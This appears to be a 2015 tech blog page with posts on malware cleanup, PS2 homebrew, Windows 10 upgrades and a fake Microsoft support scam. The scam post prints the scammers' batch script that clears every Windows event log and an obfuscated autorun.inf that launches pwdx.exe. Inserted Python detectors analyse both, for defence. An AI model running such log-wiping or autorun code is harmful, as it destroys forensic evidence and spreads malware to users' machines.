Wednesday, December 30, 2015

Addonjet and a.karmakitty.info

What a crap...
Another malware-cleaning case shows how to get rid of the annoying karmakitty pop-ups in Google Chrome and the unwanted ads by Addonjet.

The computer is infected with malware and the web browser can't be used properly anymore. With every step you take another pop-up appears, wanting you to call a phone number. In my case the problems only occurred in Google Chrome.


Browser extensions which may also have been responsible for this couldn't be removed anymore: the settings menu closed as soon as you tried to open the extension list. Clearing the cache didn't solve this either.

Since no unwanted software was installed, the fastest and most effective way was to run a complete malware scan. I recommend Malwarebytes Anti-Malware, which found a lot of infections.
After the clean-up and a restart the whole issue was solved. Make sure your antivirus software is working properly, or maybe get a better one.

Tuesday, December 29, 2015

TheSuperAdmins #001: It's not just about the key

'TheSuperAdmins' is a new IT comic parody showing the everyday life in an IT department in a funny way.

The first story is about a complaint and a special wish from the boss...


View full size: #1: It's not just about the key.

Tuesday, December 22, 2015

How to use homebrew software on PS2 - An overview

Towards the end of and after the PS2 era, more and more homebrew software was released for the famous console of the early 2000s. Once the first step was done, you were able to run a whole range of applications.

First, you had to find a way to install 'FreeMCBoot' (FMCB for short) on your Memory Card. I only know two ways to do that: either let someone who already has it install FMCB on your Memory Card, or buy a network adapter to install a hard disk in the PS2 (of course only possible with the older, bigger model), install an ISO image with homebrew software on that hard disk and boot it with a special CD.


Installing FMCB

I would recommend the Windows tool WinHIIP for that: connect the IDE hard drive to your PC, either with a USB adapter or directly with an IDE cable. Start the tool and select the ISO you want to install (it's usually used for games). Before that, the hard drive must be formatted in PFS, which WinHIIP can do as well.

After that the hard disk goes back into the PS2. The 'special CD' mentioned above is something like 'HD Advance' or any other software that was sold together with the network adapter to use the hard disk.

So after booting the CD you'll end up in a menu listing all PS2 games installed on the hard disk, including the ISO with homebrew software. This image should include 'ULaunchELF', a program which, as the name says, is able to execute ELF files.

ULaunchELF is a kind of file explorer for the PlayStation 2. You can even plug in a USB flash drive (formatted in FAT32, of course) and use it for saving and executing files. ELF files ("Executable and Linkable Format") can be run from this point on. You only need a few of them.

But now you should use the opportunity to install FMCB by launching the installation files from either a USB drive or the hard drive. Make sure you have some free space on your Memory Card: it takes around 2 MB, which matters because the Memory Cards usually had only 8 MB.

From that point on your boot menu is extended, and you can add more software to the list using the configurator.

What does this give you?

You can use the 'Simple Media System' ('SMS Player' for short) to turn your PS2 into a media center, even with files on your external HDD. Unfortunately, since development stopped, not every media file plays: the mp4 format in particular does not work, while at least most avi files run.

Some minigames are available, like rebuilds of Space Invaders, Tetris or even Super Mario, each started as a single ELF.

Emulators: there is a whole range of ways to play games from older consoles like NES, SNES, GB, C64 and many more. In recent years there has even been a PlayStation 1 emulator for its successor. Unfortunately it is a bit slow, but you can't expect miracles when starting such big games from a flash drive...

ESR offers an alternative way to play copied games from disc without a special chip: a game with the ESR patch applied can be started from the FMCB menu.

There are also other ways to start games from your hard drive: with OpenPS2Loader you can not only launch games from your HDD, you can also create Virtual Memory Cards (VMC) to keep your savegames in a special folder on your HDD. And there's more: you can use your FAT32 external hard drive or a shared folder in your network to store your games instead of an internal hard drive. And although it is already 2015, there is still development going on!

Summary

Even this short overview shows how many possibilities you have once the PS2 is able to launch ELF files, features far beyond what the basic firmware offers.

Of course the successor PS3 has far more to offer in the homebrew area, but in the PS2 era the firmware didn't change every week, only with the release of newer models, which makes using homebrew a lot easier.

Friday, December 11, 2015

Forcing the upgrade to Windows 10

Since distribution started last summer, Windows 10 has been deployed on a lot of former Windows 7 or 8 computers. At the beginning you could wait for a while to get your upgrade; by now it usually doesn't take too long for an upgrade invitation. And if it doesn't come, you can force it with a tool...

In the case of a freshly installed Windows 7 with updates missing, you usually have to wait a while before you get the direct offer to upgrade to the latest Microsoft operating system.


The folder on drive C:\
Following this link you'll find a Microsoft tool (GetWindows10-Web_Default_Attr.exe) with which you can start the upgrade. It goes through a few steps, the first of course being the download itself. During this process three new folders are created on the C:\ drive (as seen in the picture).

It's important to keep this download running, which also means having a stable internet connection. Once the download is aborted for some reason you can't resume it with this tool.
You get a message saying that another restart is needed to make the tool work again, and it appears every time you try. You need to delete these new folders on C:\, which is easiest when booting the computer from a Live OS on CD/DVD.
Otherwise the biggest file within these folders can't be deleted because it's in use. Safe Mode might be another option; you just have to get rid of these folders. Once that's done, you can continue by starting the tool again.



After the download some checks follow, and you have to accept the license agreement before the search for updates starts.

After that the usual Windows 10 installation procedure continues.

And that's it.

Tuesday, December 8, 2015

A call from Microsoft 'to fix the issue'

Sometimes you hear stories about scammers pretending to work for Microsoft who try to get access to private computers. Their victims are gullible people who are called directly at home. Recently I got to see a Windows 7 system that such a 'helpdesk guy' had had access to...

It all starts with a phone call in which these guys say they're from Microsoft and that there is an issue on the computer that needs fixing.

Interestingly, they even call people in Germany while speaking only English and just a bit of German.

Whenever there were comprehension problems they used online translation tools to move on, and they kept assuring that if this procedure costs something, they would say so (as seen later...).

Getting access

To convince people that they're trustworthy they mention a combination of numbers and later show them the exact same digits somewhere on the computer. I don't know which numbers, but obviously a combination that is the same on all Windows machines.

To get access they have their victims go to https://showmypc.com to download a remote support tool. This tool apparently includes a service and a version of TightVNC.

Additionally they use the tool "LogMeIn Rescue" (https://secure.logmein.com) for file transfer. Then they copy a txt file to the desktop with the following three lines to 'prove' they're real:
My Name = Christopher winter
My Employee ID = MS98646
Our Email Address = support@microsoft.com

The 'cleaning'

During this remote session the tool ATF Cleaner was copied to the computer. According to the website (www.atribune.org) this software is from 2006, so it is meant for Windows 2000 and Windows XP, with extra notes added for Windows Vista support.

The tool can only delete the cache of Firefox and Opera. Given its age, the only reason for using this exe must be to distract from something, maybe from the batch file that was copied and executed shortly afterwards, named CLEANER.bat.

Correct me if I'm wrong, but its purpose is to get admin access and delete the event logs.
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

Around that time the fake support guy said he wanted to install special cleaning software for around 90 euros. He could not send an email or any other information material; it was only about installing it now or not. At that point the user of the computer ended the call.

The CLEANER.bat wasn't deleted properly, since I found it in the Recycle Bin. But the event log had indeed been started afresh...
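The batch file above first checks for administrator rights (the bcdedit trick) and then runs wevtutil cl over every log name that wevtutil el returns. Windows records the clearing itself: Event ID 1102 from the provider Microsoft-Windows-Eventlog is written into the Security log, and Event ID 104 from the same provider into the System log for every other log. Those records survive in the freshly emptied logs, so a wipe is visible as a burst of 104/1102 events within seconds, and as Security and System logs whose first record is the clearing event. The following Python script is an added example and not part of the original post; it shows how such a wipe could be detected in an exported event list. The export format (one JSON object per line) and all records in it are constructed for this example, not data from the affected computer.

```python
"""Added example: spotting an event-log wipe like the one CLEANER.bat performs.

Windows writes a record when a log is cleared: Event ID 1102 into the Security
log and Event ID 104 into the System log (provider Microsoft-Windows-Eventlog).
Clearing a log does not remove the record of the clearing itself, so after a
script has run 'wevtutil cl' over every log, the first surviving record in
Security and System is the clearing event and the 104/1102 events arrive
within seconds of each other.  The export format (one JSON object per line)
and all records below are constructed for this example.
"""
import json
import re
from datetime import datetime, timedelta

CLEAR_PROVIDER = "Microsoft-Windows-Eventlog"
LOG_NAME = re.compile(r"The (.+) log file was cleared")

# Constructed sample export: a wipe burst on 2015-12-05, later benign events,
# and a single manual clear three days later.
SAMPLE_EXPORT = """\
{"log": "Security", "id": 1102, "provider": "Microsoft-Windows-Eventlog", "time": "2015-12-05T14:02:10", "message": "The audit log was cleared."}
{"log": "System", "id": 104, "provider": "Microsoft-Windows-Eventlog", "time": "2015-12-05T14:02:11", "message": "The System log file was cleared."}
{"log": "System", "id": 104, "provider": "Microsoft-Windows-Eventlog", "time": "2015-12-05T14:02:13", "message": "The Windows PowerShell log file was cleared."}
{"log": "System", "id": 7036, "provider": "Service Control Manager", "time": "2015-12-05T14:20:40", "message": "The Windows Update service entered the stopped state."}
{"log": "Security", "id": 4624, "provider": "Microsoft-Windows-Security-Auditing", "time": "2015-12-06T09:00:05", "message": "An account was successfully logged on."}
{"log": "System", "id": 104, "provider": "Microsoft-Windows-Eventlog", "time": "2015-12-08T10:15:00", "message": "The Application log file was cleared."}
"""


def load_events(text):
    """Parse one JSON record per line and return them sorted by time."""
    events = []
    for line in text.splitlines():
        if line.strip():
            event = json.loads(line)
            event["time"] = datetime.fromisoformat(event["time"])
            events.append(event)
    return sorted(events, key=lambda e: e["time"])


def is_clear_event(event):
    """True for the two records Windows writes when a log is cleared."""
    if event.get("provider") != CLEAR_PROVIDER:
        return False
    return ((event["log"] == "Security" and event["id"] == 1102)
            or (event["log"] == "System" and event["id"] == 104))


def cleared_log_name(event):
    """Name of the log a clearing record refers to (None if not a clear)."""
    if event["log"] == "Security" and event["id"] == 1102:
        return "Security"
    match = LOG_NAME.search(event.get("message", ""))
    return match.group(1) if match else None


def clear_bursts(events, window=timedelta(seconds=30), minimum=2):
    """Group clearing events that follow each other within `window`;
    a scripted wipe produces one group with many members."""
    groups, current = [], []
    for event in (e for e in events if is_clear_event(e)):
        if current and event["time"] - current[-1]["time"] > window:
            groups.append(current)
            current = []
        current.append(event)
    if current:
        groups.append(current)
    return [g for g in groups if len(g) >= minimum]


def logs_starting_with_clear(events):
    """Logs whose oldest surviving record is the clearing event itself."""
    first = {}
    for event in events:            # events are sorted ascending by time
        first.setdefault(event["log"], event)
    return sorted(log for log, e in first.items() if is_clear_event(e))


def analyze(text):
    """Summarize wipe indicators found in an exported event list."""
    events = load_events(text)
    clears = [e for e in events if is_clear_event(e)]
    return {
        "clear_events": len(clears),
        "cleared_logs": sorted({cleared_log_name(e) for e in clears}),
        "bursts": [(g[0]["time"].isoformat(), g[-1]["time"].isoformat(), len(g))
                   for g in clear_bursts(events)],
        "logs_starting_with_clear": logs_starting_with_clear(events),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_EXPORT).items():
        print(f"{key}: {value}")
```

Against the constructed sample the script reports four clearing events, one burst of three within a few seconds on 2015-12-05, and that both the Security and the System log begin with their own clearing record; the isolated clear of the Application log three days later is counted but not treated as a burst.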

Further traces

In 'Run' (Windows+R) I found the following commands, which were the ones last used:

iexplorer support.me (leads to https://secure.logmeinrescue.com/Customer/Code.aspx)
services.msc
eventvwr
certmgr.msc
prefetch
winver
msconfig

Looking for further hints of what had been done, I saw two suspicious files whose modification time fell exactly at the end of the period in which the 'support' had access. In the root folder of the second hard drive there is a pwdx.exe and an autorun.inf which is meant to open the exe file (see below).

;wnylejSrKiV rQxf eiYqRlldTudXghdrnqmBjyIgAeaGLphfkBfnuegSkajgEnux
;
open= pwdx.exe
;
sHeLL\exPLOre\COmmanD = pwdx.exe
;fLeR
shell\OpeN\cOmmAND=pwdx.exe
;
sHElL\AutOpLay\cOmmand =pwdx.exe
[AutoRun]
;
shell\opEN\DeFaULt=1
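The autorun.inf above uses random-case keys, junk comment lines and an [AutoRun] header placed after most of the keys so that it looks like garbage to a casual reader, while every shell verb (open, explore, autoplay) still points at the same executable. The Python script below is an added example and not part of the original post: it reads such a file the lenient, case-insensitive way an INI reader does, lists every program the file would launch and reports the obfuscation tricks it finds. The hostile sample is the file from the post; the benign autorun.inf it is compared against is constructed for the example.

```python
"""Added example: triage parser for a suspicious autorun.inf.

Windows compares INI keys case-insensitively and ignores ';' comment lines, so
a parser that normalizes case and skips comments sees the same instructions
the system would act on, regardless of how scrambled the file looks.
"""
import re

# Sample input: the autorun.inf found on the second hard drive in the post.
SAMPLE_AUTORUN = r"""
;wnylejSrKiV rQxf eiYqRlldTudXghdrnqmBjyIgAeaGLphfkBfnuegSkajgEnux
;
open= pwdx.exe
;
sHeLL\exPLOre\COmmanD = pwdx.exe
;fLeR
shell\OpeN\cOmmAND=pwdx.exe
;
sHElL\AutOpLay\cOmmand =pwdx.exe
[AutoRun]
;
shell\opEN\DeFaULt=1
"""

# Constructed benign sample for comparison: only an icon and a volume label.
BENIGN_AUTORUN = "[AutoRun]\nicon=setup.exe,0\nlabel=Driver Disc\n"

LAUNCH_KEYS = {"open", "shellexecute"}                   # keys that start a program
VERB_COMMAND = re.compile(r"shell\\([^\\]+)\\command")   # shell\<verb>\command
VERB_DEFAULT = re.compile(r"shell\\([^\\]+)\\default")   # shell\<verb>\default


def parse_autorun(text):
    """Return (entries, raw_keys, keys_before_header).

    entries maps the lower-cased key to its value, raw_keys keeps the keys as
    written so their casing can be judged, and keys_before_header counts the
    keys that appear before any [AutoRun] header line.
    """
    entries, raw_keys = {}, []
    keys_before_header, header_seen = 0, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                          # comment or padding line
        if line.startswith("[") and line.endswith("]"):
            header_seen = header_seen or line.lower() == "[autorun]"
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue                          # not a key=value line
        key = key.strip()
        raw_keys.append(key)
        if not header_seen:
            keys_before_header += 1
        entries[key.lower()] = value.strip()
    return entries, raw_keys, keys_before_header


def launched_programs(entries):
    """Every program the file would start (first token of each launch value)."""
    programs = set()
    for key, value in entries.items():
        if (key in LAUNCH_KEYS or VERB_COMMAND.fullmatch(key)) and value:
            programs.add(value.split()[0].lower())
    return sorted(programs)


def random_case_keys(raw_keys):
    """Keys with a path segment that is neither lower, UPPER nor Capitalized."""
    def odd(segment):
        return segment not in (segment.lower(), segment.upper(), segment.capitalize())
    return [k for k in raw_keys if any(odd(s) for s in k.split("\\"))]


def triage_autorun(text):
    """Return a list of findings; an empty list means nothing stood out."""
    entries, raw_keys, before_header = parse_autorun(text)
    findings = []
    programs = launched_programs(entries)
    if programs:
        findings.append("launches: " + ", ".join(programs))
    odd_keys = random_case_keys(raw_keys)
    if odd_keys:
        findings.append("random-case keys (obfuscation): " + ", ".join(odd_keys))
    if before_header:
        findings.append(f"{before_header} key(s) placed before the [AutoRun] header")
    # Several verbs bound to one program: double-click, Explore and AutoPlay
    # all end up running the same file.
    by_program = {}
    for key, value in entries.items():
        match = VERB_COMMAND.fullmatch(key)
        if match and value:
            by_program.setdefault(value.split()[0].lower(), []).append(match.group(1))
    for program, verbs in by_program.items():
        if len(verbs) > 1:
            findings.append(f"'{program}' bound to {len(verbs)} shell verbs: "
                            + ", ".join(sorted(verbs)))
    for key, value in entries.items():
        match = VERB_DEFAULT.fullmatch(key)
        if match and value == "1":
            findings.append(f"verb '{match.group(1)}' forced as the double-click default")
    return findings


if __name__ == "__main__":
    for name, body in (("sample", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name + ":")
        for finding in triage_autorun(body) or ["no findings"]:
            print("  -", finding)
```

For the file from the post the script resolves every scrambled key to pwdx.exe, counts four random-case keys and four keys placed before the header, and notes that three shell verbs point at the same program while shell\open\default=1 makes that verb the double-click action; the constructed benign file produces no findings.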

I'm not sure what exactly pwdx.exe is. The only information I found is that it might be a Linux-based monitoring tool. Please comment if you know more.

Anyway, the computer was full of these virus warning windows, as seen in the screenshot. And there was also a warning message from the internet service provider the next day.

During the time the session was running, anything could have been done. These are just the few things I found in a short amount of time.

After this event the computer wasn't connected to the internet anymore. A reinstallation was more than necessary...

Note: If anybody knows more about these fake helpdesk people or has his or her own experiences with them, feel free to comment.

Sunday, December 6, 2015

Windows Updates not working after malware cleanup

A Windows 7 computer was infected with viruses, malware etc., and after a successful cleaning procedure one visible problem remained: Windows Update was not working anymore.

While trying to search for further updates the following message appeared:

Windows Update cannot currently check for updates because the service is not running.

But the service is definitely running. To fix this, the following steps need to be done:

1. Open services.msc (or go to computer management) to stop the Windows Update service.

2. Go to C:\Windows and rename the folder "SoftwareDistribution" to something like "SoftwareDistribution_old".

3. Restart the Windows Update service and restart the computer. The folder will be recreated.

4. Go to Windows Update again and search for updates. This time you are offered the installation of "New Windows Update software". Confirm it.

5. After that the search for updates seems endless, only to end with an error message like one of these two: 0x80072EE2 or 0x8007000E. It won't continue.

6. So now go to the Internet Explorer options and reset the settings and cache completely. Restart your computer and all of a sudden the updates will appear.

And there they are...

Anyway: after such virus problems several other things in the operating system can be damaged. The safest and most recommended way would be to save the data and reinstall the OS. This is just a quick fix to get Windows Update working again.